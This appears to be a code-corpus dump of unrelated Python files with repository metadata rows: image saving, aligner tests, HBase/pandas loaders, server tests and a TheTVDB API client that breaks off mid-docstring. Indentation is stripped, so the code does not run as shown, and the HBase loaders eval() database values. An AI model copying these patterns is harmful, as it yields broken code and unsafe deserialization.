screen[y][x] = DEFAULT_COLOR[:]
def clear_zbuffer( zb ):
for y in range( len(zb) ):
for x in range( len(zb[y]) ):
zb[y][x] = float('-inf')
def save_ppm( screen, fname ):
f = open( fname, 'wb' )
ppm = 'P6\n' + str(len(screen[0])) +' '+ str(len(screen)) +' '+ str(MAX_COLOR) +'\n'
f.write(ppm.encode())
for y in range( len(screen) ):
for x in range( len(screen[y]) ):
pixel = screen[y][x]
f.write( bytes(pixel) )
f.close()
def save_ppm_ascii( screen, fname ):
f = open( fname, 'w' )
ppm = 'P3\n' + str(len(screen[0])) +' '+ str(len(screen)) +' '+ str(MAX_COLOR) +'\n'
for y in range( len(screen) ):
row = ''
for x in range( len(screen[y]) ):
pixel = screen[y][x]
row+= str( pixel[ RED ] ) + ' '
row+= str( pixel[ GREEN ] ) + ' '
row+= str( pixel[ BLUE ] ) + ' '
ppm+= row + '\n'
f.write( ppm )
f.close()
def save_extension( screen, fname ):
ppm_name = fname[:fname.find('.')] + '.ppm'
save_ppm( screen, ppm_name )
p = Popen( ['convert', ppm_name, fname ], stdin=PIPE, stdout = PIPE )
p.communicate()
remove(ppm_name)
def display( screen ):
ppm_name = 'pic.ppm'
save_ppm( screen, ppm_name )
p = Popen( ['display', ppm_name], stdin=PIPE, stdout = PIPE )
p.communicate()
remove(ppm_name)
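
# Minimal usage sketch (save_extension/display shell out to ImageMagick's
# `convert`/`display`, which must be installed):
#
#   screen = new_screen()
#   zb = new_zbuffer()
#   plot(screen, zb, [255, 0, 0], 250, 250, 0)
#   save_extension(screen, 'pic.png')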
| [
"[email protected]"
] | |
d897144be27bc308b3927bb78256939faeaab5ba | 509bf02d033c6a3c274360ab16f75c109a0ba31c | /test/test_hunalign.py | c59304af881eb0c447039bdebeb687d76180c585 | [] | no_license | israaar/textaligner | bb3a6b8210a12799ef40bec44b942f5ca325d2a8 | a03e28cc8264e0c207a7f1b6f56b0dbcc04eeba1 | refs/heads/master | 2022-01-27T14:35:43.553965 | 2019-05-16T07:57:14 | 2019-05-16T07:57:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,470 | py | # -*- coding: utf-8 -*-
import os.path
import unittest
import sys
from pprint import pprint
import operator
sys.path.append(os.path.abspath('..'))
from align import align, align_html
from hunalign import align_with_lang
class TestHunalign(unittest.TestCase):
def setUp(self):
self.maxDiff = None
def testUnalignedText(self):
left_text = \
"""シャーロックホームズにとって、彼女はいつも「あの女」である。ホームズが彼女を他の名前で呼ぶのはほとんど聞いたことがない。彼の目には、 彼女がそびえ立って女という性全体を覆い隠している。しかし、彼はアイリーン・アドラーに愛のような激情は一切感じていなかった。すべての激情は、そして特に愛というものは、 相容れなかった、彼の冷静で厳格だが見事に調整された心とは。
"""
right_text = \
"""TO SHERLOCK HOLMES she is always the woman. I have seldom heard him mention her under any other name. In his eyes she eclipses and predominates the whole of her sex. It was not that he felt any emotion akin to love for Irene Adler. All emotions, and that one particularly, were abhorrent to his cold, precise but admirably balanced mind.
"""
split_text = align(left_text, right_text)
split_text = list(split_text)
self.assertEqual(
split_text,
[('シャーロックホームズにとって、彼女はいつも「あの女」である。',
'TO SHERLOCK HOLMES she is always the woman.'),
('ホームズが彼女を他の名前で呼ぶのはほとんど聞いたことがない。',
'I have seldom heard him mention her under any other name.'),
('彼の目には、 彼女がそびえ立って女という性全体を覆い隠している。',
'In his eyes she eclipses and predominates the whole of her sex.'),
('しかし、彼はアイリーン・アドラーに愛のような激情は一切感じていなかった。',
'It was not that he felt any emotion akin to love for Irene Adler.'),
('すべての激情は、そして特に愛というものは、 相容れなかった、彼の冷静で厳格だが見事に調整された心とは。',
'All emotions, and that one particularly, were abhorrent to his cold, '
'precise but admirably balanced mind.'),
('', '')]
)
def testAlignedText(self):
left_text = \
"""シャーロックホームズにとって、彼女はいつも「あの女」である。
ホームズが彼女を他の名前で呼ぶのはほとんど聞いたことがない。
彼の目には、 彼女がそびえ立って女という性全体を覆い隠している。
しかし、彼はアイリーン・アドラーに愛のような激情は一切感じていなかった。
すべての激情は、そして特に愛というものは、 相容れなかった、彼の冷静で厳格だが見事に調整された心とは。"""
right_text = \
"""TO SHERLOCK HOLMES she is always the woman.
I have seldom heard him mention her under any other name.
In his eyes she eclipses and predominates the whole of her sex.
It was not that he felt any emotion akin to love for Irene Adler.
All emotions, and that one particularly, were abhorrent to his cold, precise but admirably balanced mind."""
split_text = align_with_lang('ja', left_text, 'en', right_text)
split_text = list(split_text)
# pprint(split_text)
self.assertEqual(
split_text,
[('シャーロックホームズにとって、彼女はいつも「あの女」である。',
'TO SHERLOCK HOLMES she is always the woman.'),
('ホームズが彼女を他の名前で呼ぶのはほとんど聞いたことがない。',
'I have seldom heard him mention her under any other name.'),
('彼の目には、 彼女がそびえ立って女という性全体を覆い隠している。',
'In his eyes she eclipses and predominates the whole of her sex.'),
('しかし、彼はアイリーン・アドラーに愛のような激情は一切感じていなかった。',
'It was not that he felt any emotion akin to love for Irene Adler.'),
('すべての激情は、そして特に愛というものは、 相容れなかった、彼の冷静で厳格だが見事に調整された心とは。',
'All emotions, and that one particularly, were abhorrent to his cold, '
'precise but admirably balanced mind.')]
)
# pprint(list(split_text))
def testHtmlText(self):
left_text = \
"""シャーロックホームズにとって、彼女はいつも「あの女」である。<br>ホームズが彼女を他の名前で呼ぶのはほとんど聞いたことがない。<br><br>彼の目には、 彼女がそびえ立って女という性全体を覆い隠している。
"""
right_text = \
"""TO SHERLOCK HOLMES she is always the woman.<br>I have seldom heard him mention her under any other name.<br><br>In his eyes she eclipses and predominates the whole of her sex."""
split_text = align_html(left_text, right_text)
split_text = list(split_text)
self.assertEqual(
split_text,
[('シャーロックホームズにとって、彼女はいつも「あの女」である。',
'TO SHERLOCK HOLMES she is always the woman.'),
('ホームズが彼女を他の名前で呼ぶのはほとんど聞いたことがない。',
'I have seldom heard him mention her under any other name.'),
             ('彼の目には、 彼女がそびえ立って女という性全体を覆い隠している。',
              'In his eyes she eclipses and predominates the whole of her sex.')]
        )  # the HTML inputs above contain only these three sentence pairs
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestHunalign)
unittest.TextTestRunner(verbosity=2).run(suite)
| [
"[email protected]"
] | |
11c22d73f60539e4d366a803c0661c8593aee320 | d889769f22d95d686ffce6564b1a5529e462d770 | /utils/get_data.py | 6bfb524940602e4ebf825f56b25e00790700921d | [] | no_license | ycpan/HbaseOperation | 2051ad1992ca3dd57d8a180d88b56c46549e28ae | 15f470fad590d9f4635d5b38407f8f739bd621f3 | refs/heads/master | 2022-02-13T05:15:18.745507 | 2019-07-09T02:51:40 | 2019-07-09T02:51:40 | 120,189,360 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,498 | py | import pandas as pd
import pickle
import happybase
import struct
import numpy as np
import sys
# from influxdb import DataFrameClient
import re
import time
from datetime import datetime, timezone, timedelta
# from utils.conf import sql_db_configs
def get_csv_data(path, header=None):
"""load padas dataframe from csv file
Arguments:
path {str} -- filepath of the csv file
Returns:
pandas.DataFrame -- loaded data
"""
return pd.read_csv(path, sep=',', encoding='utf-8', header=header)
def get_pickle_data(path):
"""load data from pickle file
Arguments:
path {str} -- filepath of the pickle file
Returns:
object -- loaded data
"""
with open(path, 'rb') as file:
return pickle.load(file)
def get_df_from_hbase(con, table_name, key, cf='hb', timestamp=None, include_timestamp=False):
"""Read a pandas DataFrame object from HBase table.
Arguments:
con {happybase.Connection} -- HBase connection object
table_name {str} -- HBase table name to read
key {str} -- row key from which the DataFrame should be read
Keyword Arguments:
cf {str} -- Column Family name (default: {'hb'})
Returns:
[pandas.DataFrame] -- Pandas DataFrame object read from HBase
"""
table = con.table(table_name)
column_dtype_key = key + 'columns'
column_dtype = table.row(column_dtype_key, columns=[cf], timestamp=timestamp, include_timestamp=include_timestamp)
columns = {col.decode().split(':')[1]: value.decode() for col, value in column_dtype.items()}
column_order_key = key + 'column_order'
column_order_dict = table.row(column_order_key, columns=[cf], timestamp=timestamp,
include_timestamp=include_timestamp)
column_order = list()
for i in range(len(column_order_dict)):
column_order.append(column_order_dict[bytes(':'.join((cf, str(i))), encoding='utf-8')].decode())
# # row_start = key + 'rows' + struct.pack('>q', 0)
# row_start = key + 'rows' + str(column_order(0))
# # row_end = key + 'rows' + struct.pack('>q', sys.maxint)
# row_end = key + 'rows' + str(column_order[len(column_order) - 1])
row_key_template = key + '_rows_'
# scan_columns = ['{}{}'.format(row_key_template, item) for item in column_order]
HBase_rows = table.scan(row_prefix=bytes(row_key_template, encoding='utf-8'))
# HBase_rows = table.scan(columns='cf:')
df = pd.DataFrame()
for row in HBase_rows:
column_name = row[0].decode().split('_')[len(row[0].decode().split('_')) - 1]
df_column = {key.decode().split(':')[1]: value.decode() for key, value in row[1].items()}
pd_series = pd.Series(df_column)
# df = df.append(df_column, ignore_index=True)
df[column_name] = pd_series
for column, data_type in columns.items():
if len(list(columns.items())) == 1:
column = df.columns[0]
if column == '':
continue
try:
df[column] = pd.to_numeric(df[column])
except ValueError:
pass
df[column] = df[column].astype(np.dtype(data_type))
return df
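
# Minimal usage sketch (host, table and key names are placeholders):
#
#   con = happybase.Connection('localhost')
#   df = get_df_from_hbase(con, 'results', 'run42', cf='hb')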
def get_specify_maximum_version_from_cell(con, table_name, row_key, cf='hb', timestamp=None, include_timestamp=False):
table = con.table(table_name)
cell = table.row(row_key, columns=[cf], timestamp=timestamp, include_timestamp=include_timestamp)
# cell1 = table.cells(row_key, column=cf, versions=5, timestamp=timestamp,
# include_timestamp=True)
type_set = set()
columnsOrder = None
SeriesName = None
columnsType = None
columnsOrder_cf = None
SeriesName_cf = None
columnsType_cf = None
    res = None
    ts = None  # stays None when the cell is empty, so the final check below is safe
for cf, value in cell.items():
if len(value) == 2:
value, ts = value
else:
value = value
ts = None
cf_qualifier = cf.decode().split(':')[1]
data_type = cf_qualifier.split('_')[0]
type_set.add(data_type)
data_content = cf_qualifier.split('_')[1]
if data_content == 'columnsOrder':
columnsOrder = eval(value.decode())
columnsOrder_cf = cf
if data_content == 'SeriesName':
SeriesName = value.decode()
SeriesName_cf = cf
if data_content == 'columnsType':
try:
columnsType = eval(value.decode())
except NameError:
columnsType = value.decode()
columnsType_cf = cf
if columnsOrder_cf is not None:
cell.pop(columnsOrder_cf)
if SeriesName_cf is not None:
cell.pop(SeriesName_cf)
if columnsType_cf is not None:
cell.pop(columnsType_cf)
cell_keys = cell.keys()
if columnsOrder_cf in cell_keys or SeriesName_cf in cell_keys or columnsType_cf in cell_keys:
        raise ValueError('more than one clean_log was written into one cell')
# if len(type_set) > 2:
# raise ValueError('more than one clean_log input one cell')
# if len(type_set) >= 2:
# raise ValueError('in one cell may have two data type, this can not deal it')
if 'DataFrame' in type_set:
if len(type_set) > 2:
            raise ValueError('one cell appears to hold two data types; this case is not handled')
res = pd.DataFrame()
for cf, value in cell.items():
            if isinstance(value, tuple):
                value, _ = value
cf_qualifier = cf.decode().split(':')[1]
data_index = cf_qualifier.split('_')[1]
value = eval(value.decode())
if 'None' in value:
value = [None if v == 'None' else v for v in value]
df_sub = pd.DataFrame(np.array(value).reshape(1, -1),
columns=columnsOrder, index=[data_index])
res = res.append(df_sub)
for column, data_type in columnsType.items():
if column == '':
continue
try:
res[str(column)] = pd.to_numeric(res[str(column)])
except ValueError:
pass
res[str(column)] = res[str(column)].astype(np.dtype(data_type))
elif 'Series' in type_set:
if len(type_set) > 2:
            raise ValueError('one cell appears to hold two data types; this case is not handled')
res = pd.Series()
for cf, value in cell.items():
            if isinstance(value, tuple):
                value, _ = value
cf_qualifier = cf.decode().split(':')[1]
data_index = cf_qualifier.split('_')[1]
df_sub = pd.Series(value.decode(), index=[data_index])
res = res.append(df_sub)
if SeriesName is not None:
res.name = SeriesName
try:
res = pd.to_numeric(res)
except ValueError:
pass
res = res.astype(np.dtype(columnsType))
elif 'dict' in type_set:
if len(type_set) >= 2:
            raise ValueError('one cell appears to hold two data types; this case is not handled')
# for cf, value in cell.items():
        if isinstance(value, tuple):
            value, _ = value
res = eval(value.decode())
else:
res = dict()
for cf, value in cell.items():
            if isinstance(value, tuple):
                value, _ = value
cf_qualifier = cf.decode().split(':')[1]
data_key = cf_qualifier.split('_')[1]
# value = value.decode()
value = value
try:
value = value.decode()
value = eval(value)
except:
pass
res[data_key] = value
if ts is not None:
return res, ts
return res
def get_specify_versions_data_from_cell(con, table_name, row_key, cf='hb', versions=None, timestamp=None, include_timestamp=False):
table = con.table(table_name)
# cell = table.row(row_key, columns=[cf], timestamp=timestamp, include_timestamp=include_timestamp)
cell = table.cells(row_key, column=cf, versions=versions, timestamp=timestamp,
include_timestamp=True)
ts_set = set()
for _, ts in cell:
ts_set.add(ts)
res = []
for ts in ts_set:
res.append(get_specify_maximum_version_from_cell(con, table_name, row_key, cf, ts+1, include_timestamp))
return res
| [
"[email protected]"
] | |
816403dc9d93b4276bffb4d8e162c51ea13231b8 | 0be45470f15f12872d81f98c72e3b8528100ad27 | /pointCollection/tools/RDE.py | 563e437d633d241e661519931619d6cf3b3cf410 | [
"MIT"
] | permissive | SmithB/pointCollection | 19a43bb19b1753542f693645fe4f537c2dbf7af9 | 026a60eb7e2fbe5333c7a30bd8299dda44c5878e | refs/heads/master | 2023-08-23T18:56:49.943934 | 2023-08-18T16:41:12 | 2023-08-18T16:41:12 | 220,045,965 | 4 | 8 | MIT | 2023-07-03T15:47:58 | 2019-11-06T16:51:04 | Jupyter Notebook | UTF-8 | Python | false | false | 584 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 23 16:31:30 2017
@author: ben
"""
import numpy as np
def RDE(x):
xs=x.copy()
xs=np.isfinite(xs) # this changes xs from values to a boolean
if np.sum(xs)<2 :
return np.nan
    ind=np.arange(0.5, np.sum(xs))
    # interpolate the 16th and 84th percentiles of the sorted finite values
    LH=np.interp(np.array([0.16, 0.84])*np.sum(xs), ind, np.sort(x[xs]))
    #print('LH =',LH)
    return (LH[1]-LH[0])/2. # half the 16th-84th percentile range: a robust width (~std dev) of the data
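
# Minimal usage sketch: for a large standard-normal sample the estimate should
# come out near 1 (the 16th-84th percentile half-range of N(0,1)):
#
#   rng = np.random.default_rng(0)
#   print(RDE(rng.standard_normal(10000)))   # ~1.0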
#import scipy.stats as stats
#def RDE(x):
# return (stats.scoreatpercentile(x, 84 )-stats.scoreatpercentile(x, 16))/2. | [
"[email protected]"
] | |
56688f3f32ef27e8f1ae4b5c9144316bdf9ad2cd | 21e2782bb70f183876c55940d7cefc1c82b16472 | /interview/server/tests.py | 066d157435dbd90bf9cbc7cd036fd76f04a93a3a | [] | no_license | RajsimmanRavi/backend-challenge | 13bdc09417fe4d2a7cce54288e27c73c800cf854 | f30860a868493a963ec98fc749b4ae3016a5c766 | refs/heads/master | 2020-08-09T04:29:56.057638 | 2019-10-09T18:53:30 | 2019-10-09T18:53:30 | 213,998,608 | 0 | 0 | null | 2019-10-09T18:50:22 | 2019-10-09T18:50:21 | null | UTF-8 | Python | false | false | 2,011 | py | import requests
import unittest
import random
from random import randint
from datetime import datetime
random.seed(datetime.now())
class TestStringMethods(unittest.TestCase):
def test_get(self):
response = requests.get('http://127.0.0.1:8000/conversations/1234')
self.assertIn("anson", response.text)
def test_get_non_existent(self):
response = requests.get('http://127.0.0.1:8000/conversations/12456')
self.assertIn("matching query does not exist", response.text)
def test_get_non_int(self):
response = requests.get('http://127.0.0.1:8000/conversations/124abc')
self.assertEqual(response.status_code, 404)
def test_get_nothing(self):
response = requests.get('http://127.0.0.1:8000/conversations/')
self.assertEqual(response.status_code, 404)
def test_post(self):
rand_int = str(randint(1000,9999))
data = {"id": rand_int ,"sender": "anson", "message": "I am a coffee pot" }
response = requests.post('http://127.0.0.1:8000/messages/', json=data)
self.assertIn("Successfully stored", response.text)
response = requests.get('http://127.0.0.1:8000/conversations/'+rand_int)
self.assertIn("anson", response.text)
def test_post_no_id(self):
data = {"sender": "anson", "message": "I am a coffee pot"}
response = requests.post('http://127.0.0.1:8000/messages/', json=data)
self.assertIn("error", response.text)
def test_post_no_sender(self):
data = {"id": "12", "message": "I am a coffee pot"}
response = requests.post('http://127.0.0.1:8000/messages/', json=data)
self.assertIn("error", response.text)
def test_post_no_message(self):
data = {"id": "12", "sender": "raj", "message": "I am a coffee pot"}
response = requests.post('http://127.0.0.1:8000/messages/', json=data)
self.assertIn("error", response.text)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
11e480051d1e2e4b524f910449fa7a03d3d0f592 | b3db0cb0849fc3c981077cc5dc071c6eac6fd1ed | /C.1.14.py | f9372e61feee0ec164fad2d51aa25739dd93f3b8 | [] | no_license | Andi-Abdi/Tugas-Struktur-Data | bcfcfd3cf4ac28ce966b30d07041d775b33db778 | 49162ad9c5869161df01bc1a0f8697c2d7d1623a | refs/heads/main | 2023-05-11T11:58:46.484954 | 2021-05-31T14:46:22 | 2021-05-31T14:46:22 | 372,522,215 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | py | def odd_product_pair(data):
data = set(data)
for y in data:
for x in data:
if y == x :
continue
if y*x % 2 == 1:
return True
return False
print(odd_product_pair([5,7,9,14,16])) | [
"[email protected]"
] | |
35b215ad4099e666c114c8229187f42384aed2ee | 62dcbce52fd9b47f97c8bd8df2f05fbf614d1abd | /ttvdb/tvdb_api.py | 0a08be8cfb5645e6e03b9e9c4eb10664ed74cfbc | [
"MIT"
] | permissive | namgar/mythboxee | e7007e435eea5cd5c74fd31e422bf2a259c6168b | 80129d47a85ad867bc1687958ba23387c705c789 | refs/heads/master | 2021-01-23T20:22:48.516873 | 2010-11-23T02:05:04 | 2010-11-23T02:05:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,282 | py | #!/usr/bin/env python
#encoding:utf-8
#author:dbr/Ben
#project:tvdb_api
#repository:http://github.com/dbr/tvdb_api
#license:Creative Commons GNU GPL v2
# (http://creativecommons.org/licenses/GPL/2.0/)
"""Simple-to-use Python interface to The TVDB's API (www.thetvdb.com)
Example usage:
>>> from tvdb_api import Tvdb
>>> t = Tvdb()
>>> t['Lost'][4][11]['episodename']
u'Cabin Fever'
"""
__author__ = "dbr/Ben"
__version__ = "1.2.1"
import os
import sys
import urllib
import urllib2
import tempfile
import logging
try:
import xml.etree.cElementTree as ElementTree
except ImportError:
import xml.etree.ElementTree as ElementTree
from cache import CacheHandler
from tvdb_ui import BaseUI, ConsoleUI
from tvdb_exceptions import (tvdb_error, tvdb_userabort, tvdb_shownotfound,
tvdb_seasonnotfound, tvdb_episodenotfound, tvdb_attributenotfound)
class ShowContainer(dict):
"""Simple dict that holds a series of Show instances
"""
pass
class Show(dict):
"""Holds a dict of seasons, and show data.
"""
def __init__(self):
dict.__init__(self)
self.data = {}
def __repr__(self):
return "<Show %s (containing %s seasons)>" % (
self.data.get(u'seriesname', 'instance'),
len(self)
)
def __getitem__(self, key):
if key in self:
# Key is an episode, return it
return dict.__getitem__(self, key)
if key in self.data:
# Non-numeric request is for show-data
return dict.__getitem__(self.data, key)
# Data wasn't found, raise appropriate error
if isinstance(key, int) or key.isdigit():
# Episode number x was not found
raise tvdb_seasonnotfound("Could not find season %s" % (repr(key)))
else:
# If it's not numeric, it must be an attribute name, which
# doesn't exist, so attribute error.
raise tvdb_attributenotfound("Cannot find attribute %s" % (repr(key)))
def search(self, term = None, key = None):
"""
Search all episodes in show. Can search all data, or a specific key (for
example, episodename)
Always returns an array (can be empty). First index contains the first
match, and so on.
Each array index is an Episode() instance, so doing
search_results[0]['episodename'] will retrieve the episode name of the
first match.
Search terms are converted to lower case (unicode) strings.
# Examples
These examples assume t is an instance of Tvdb():
>>> t = Tvdb()
>>>
To search for all episodes of Scrubs with a bit of data
containing "my first day":
>>> t['Scrubs'].search("my first day")
[<Episode 01x01 - My First Day>]
>>>
Search for "My Name Is Earl" episode named "Faked His Own Death":
>>> t['My Name Is Earl'].search('Faked His Own Death', key = 'episodename')
[<Episode 01x04 - Faked His Own Death>]
>>>
To search Scrubs for all episodes with "mentor" in the episode name:
>>> t['scrubs'].search('mentor', key = 'episodename')
[<Episode 01x02 - My Mentor>, <Episode 03x15 - My Tormented Mentor>]
>>>
# Using search results
>>> results = t['Scrubs'].search("my first")
>>> print results[0]['episodename']
My First Day
>>> for x in results: print x['episodename']
My First Day
My First Step
My First Kill
>>>
"""
results = []
for cur_season in self.values():
searchresult = cur_season.search(term = term, key = key)
if len(searchresult) != 0:
results.extend(searchresult)
#end for cur_season
return results
class Season(dict):
def __repr__(self):
return "<Season instance (containing %s episodes)>" % (
len(self.keys())
)
def __getitem__(self, episode_number):
if episode_number not in self:
raise tvdb_episodenotfound("Could not find episode %s" % (repr(episode_number)))
else:
return dict.__getitem__(self, episode_number)
def search(self, term = None, key = None):
"""Search all episodes in season, returns a list of matching Episode
instances.
>>> t = Tvdb()
>>> t['scrubs'][1].search('first day')
[<Episode 01x01 - My First Day>]
>>>
See Show.search documentation for further information on search
"""
results = []
for ep in self.values():
searchresult = ep.search(term = term, key = key)
if searchresult is not None:
results.append(
searchresult
)
return results
class Episode(dict):
def __repr__(self):
seasno = int(self.get(u'seasonnumber', 0))
epno = int(self.get(u'episodenumber', 0))
epname = self.get(u'episodename')
if epname is not None:
return "<Episode %02dx%02d - %s>" % (seasno, epno, epname)
else:
return "<Episode %02dx%02d>" % (seasno, epno)
def __getitem__(self, key):
try:
return dict.__getitem__(self, key)
except KeyError:
raise tvdb_attributenotfound("Cannot find attribute %s" % (repr(key)))
def search(self, term = None, key = None):
"""Search episode data for term, if it matches, return the Episode (self).
The key parameter can be used to limit the search to a specific element,
for example, episodename.
        This is primarily for use by Show.search and Season.search. See
Show.search for further information on search
Simple example:
>>> e = Episode()
>>> e['episodename'] = "An Example"
>>> e.search("examp")
<Episode 00x00 - An Example>
>>>
Limiting by key:
>>> e.search("examp", key = "episodename")
<Episode 00x00 - An Example>
>>>
"""
if term == None:
raise TypeError("must supply string to search for (contents)")
term = unicode(term).lower()
for cur_key, cur_value in self.items():
cur_key, cur_value = unicode(cur_key).lower(), unicode(cur_value).lower()
if key is not None and cur_key != key:
# Do not search this key
continue
if cur_value.find( unicode(term).lower() ) > -1:
return self
#end if cur_value.find()
#end for cur_key, cur_value
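        # No match found: fall through and implicitly return None; Season.search
        # and Show.search rely on that None sentinel when collecting results.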
class Actors(list):
"""Holds all Actor instances for a show
"""
pass
class Actor(dict):
"""Represents a single actor. Should contain..
id,
image,
name,
role,
sortorder
"""
def __repr__(self):
return "<Actor \"%s\">" % (self.get("name"))
class Tvdb:
"""Create easy-to-use interface to name of season/episode name
>>> t = Tvdb()
>>> t['Scrubs'][1][24]['episodename']
u'My Last Day'
"""
def __init__(self,
interactive = False,
select_first = False,
debug = False,
cache = True,
banners = False,
actors = False,
custom_ui = None,
language = None,
search_all_languages = False,
apikey = None):
"""interactive (True/False):
            When True, the built-in console UI is used to select the correct show.
When False, the first search result is used.
select_first (True/False):
Automatically selects the first series search result (rather
than showing the user a list of more than one series).
Is overridden by interactive = False, or specifying a custom_ui
debug (True/False):
shows verbose debugging information
cache (True/False/str/unicode):
            Retrieved XML is persisted to disc. If True, it is stored in a tvdb_api
            folder under your system's TEMP_DIR; if set to a str/unicode instance,
            that is used as the cache location. If False, caching is disabled.
banners (True/False):
Retrieves the banners for a show. These are accessed
via the _banners key of a Show(), for example:
>>> Tvdb(banners=True)['scrubs']['_banners'].keys()
['fanart', 'poster', 'series', 'season']
actors (True/False):
Retrieves a list of the actors for a show. These are accessed
via the _actors key of a Show(), for example:
>>> t = Tvdb(actors=True)
>>> t['scrubs']['_actors'][0]['name']
u'Zach Braff'
custom_ui (tvdb_ui.BaseUI subclass):
A callable subclass of tvdb_ui.BaseUI (overrides interactive option)
language (2 character language abbreviation):
The language of the returned data. Is also the language search
uses. Default is "en" (English). For full list, run..
>>> Tvdb().config['valid_languages'] #doctest: +ELLIPSIS
['da', 'fi', 'nl', ...]
search_all_languages (True/False):
By default, Tvdb will only search in the language specified using
the language option. When this is True, it will search for the
            show in any language.
apikey (str/unicode):
Override the default thetvdb.com API key. By default it will use
tvdb_api's own key (fine for small scripts), but you can use your
own key if desired - this is recommended if you are embedding
            tvdb_api in a larger application.
See http://thetvdb.com/?tab=apiregister to get your own key
"""
self.shows = ShowContainer() # Holds all Show classes
self.corrections = {} # Holds show-name to show_id mapping
self.config = {}
if apikey is not None:
self.config['apikey'] = apikey
else:
self.config['apikey'] = "0629B785CE550C8D" # tvdb_api's API key
self.config['debug_enabled'] = debug # show debugging messages
self.config['custom_ui'] = custom_ui
self.config['interactive'] = interactive # prompt for correct series?
self.config['select_first'] = select_first
self.config['search_all_languages'] = search_all_languages
if cache is True:
self.config['cache_enabled'] = True
self.config['cache_location'] = self._getTempDir()
elif isinstance(cache, basestring):
self.config['cache_enabled'] = True
self.config['cache_location'] = cache
else:
self.config['cache_enabled'] = False
if self.config['cache_enabled']:
self.urlopener = urllib2.build_opener(
CacheHandler(self.config['cache_location'])
)
else:
self.urlopener = urllib2.build_opener()
self.config['banners_enabled'] = banners
self.config['actors_enabled'] = actors
self.log = self._initLogger() # Setups the logger (self.log.debug() etc)
        # List of languages from http://www.thetvdb.com/api/0629B785CE550C8D/languages.xml
        # Hard-coded here as it is relatively static, and saves another HTTP request, as
        # recommended on http://thetvdb.com/wiki/index.php/API:languages.xml
self.config['valid_languages'] = [
"da", "fi", "nl", "de", "it", "es", "fr","pl", "hu","el","tr",
"ru","he","ja","pt","zh","cs","sl", "hr","ko","en","sv","no"
]
if language is None:
self.config['language'] = "en"
elif language not in self.config['valid_languages']:
raise ValueError("Invalid language %s, options are: %s" % (
language, self.config['valid_languages']
))
else:
self.config['language'] = language
# The following url_ configs are based of the
# http://thetvdb.com/wiki/index.php/Programmers_API
self.config['base_url'] = "http://www.thetvdb.com"
if self.config['search_all_languages']:
self.config['url_getSeries'] = "%(base_url)s/api/GetSeries.php?seriesname=%%s&language=all" % self.config
else:
self.config['url_getSeries'] = "%(base_url)s/api/GetSeries.php?seriesname=%%s&language=%(language)s" % self.config
self.config['url_epInfo'] = "%(base_url)s/api/%(apikey)s/series/%%s/all/%(language)s.xml" % self.config
self.config['url_seriesInfo'] = "%(base_url)s/api/%(apikey)s/series/%%s/%(language)s.xml" % self.config
self.config['url_actorsInfo'] = "%(base_url)s/api/%(apikey)s/series/%%s/actors.xml" % self.config
self.config['url_seriesBanner'] = "%(base_url)s/api/%(apikey)s/series/%%s/banners.xml" % self.config
self.config['url_artworkPrefix'] = "%(base_url)s/banners/%%s" % self.config
#end __init__
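    # A hypothetical expansion of the templates above: with the default API key and
    # language "en", self.config['url_getSeries'] % "scrubs" becomes
    # "http://www.thetvdb.com/api/GetSeries.php?seriesname=scrubs&language=en".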
def _initLogger(self):
"""Setups a logger using the logging module, returns a log object
"""
logger = logging.getLogger("tvdb")
        formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr = logging.StreamHandler(sys.stdout)
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
if self.config['debug_enabled']:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.WARNING)
return logger
#end initLogger
def _getTempDir(self):
"""Returns the [system temp dir]/tvdb_api
"""
        import mc  # Boxee runtime module; this fork uses Boxee's temp dir
        return mc.GetTempDir()
        # Unreachable upstream fallback, kept for reference:
        # return os.path.join(tempfile.gettempdir(), "tvdb_api")
def _loadUrl(self, url, recache = False):
try:
self.log.debug("Retrieving URL %s" % url)
resp = self.urlopener.open(url)
if 'x-local-cache' in resp.headers:
self.log.debug("URL %s was cached in %s" % (
url,
resp.headers['x-local-cache'])
)
if recache:
self.log.debug("Attempting to recache %s" % url)
resp.recache()
except urllib2.URLError, errormsg:
raise tvdb_error("Could not connect to server: %s" % (errormsg))
#end try
return resp.read()
def _getetsrc(self, url):
"""Loads a URL sing caching, returns an ElementTree of the source
"""
src = self._loadUrl(url)
try:
return ElementTree.fromstring(src)
except SyntaxError:
src = self._loadUrl(url, recache=True)
try:
return ElementTree.fromstring(src)
except SyntaxError, exceptionmsg:
errormsg = "There was an error with the XML retrieved from thetvdb.com:\n%s" % (
exceptionmsg
)
if self.config['cache_enabled']:
errormsg += "\nFirst try emptying the cache folder at..\n%s" % (
self.config['cache_location']
)
errormsg += "\nIf this does not resolve the issue, please try again later. If the error persists, report a bug on"
errormsg += "\nhttp://dbr.lighthouseapp.com/projects/13342-tvdb_api/overview\n"
raise tvdb_error(errormsg)
#end _getetsrc
def _setItem(self, sid, seas, ep, attrib, value):
"""Creates a new episode, creating Show(), Season() and
        Episode()s as required. Called by _getShowData to populate it.
        Since the nice-to-use tvdb[1][24]['name'] interface
        makes it impossible to do tvdb[1][24]['name'] = "name"
and still be capable of checking if an episode exists
so we can raise tvdb_shownotfound, we have a slightly
less pretty method of setting items.. but since the API
is supposed to be read-only, this is the best way to
do it!
The problem is that calling tvdb[1][24]['episodename'] = "name"
calls __getitem__ on tvdb[1], there is no way to check if
tvdb.__dict__ should have a key "1" before we auto-create it
"""
if sid not in self.shows:
self.shows[sid] = Show()
if seas not in self.shows[sid]:
self.shows[sid][seas] = Season()
if ep not in self.shows[sid][seas]:
self.shows[sid][seas][ep] = Episode()
self.shows[sid][seas][ep][attrib] = value
#end _set_item
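    # For example, _setItem(76156, 1, 24, 'episodename', u'My Last Day') creates
    # the Show(), Season() and Episode() containers on demand before assigning
    # the attribute (series id shown is illustrative).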
def _setShowData(self, sid, key, value):
"""Sets self.shows[sid] to a new Show instance, or sets the data
"""
if sid not in self.shows:
self.shows[sid] = Show()
self.shows[sid].data[key] = value
def _cleanData(self, data):
"""Cleans up strings returned by TheTVDB.com
Issues corrected:
- Replaces & with &
- Trailing whitespace
"""
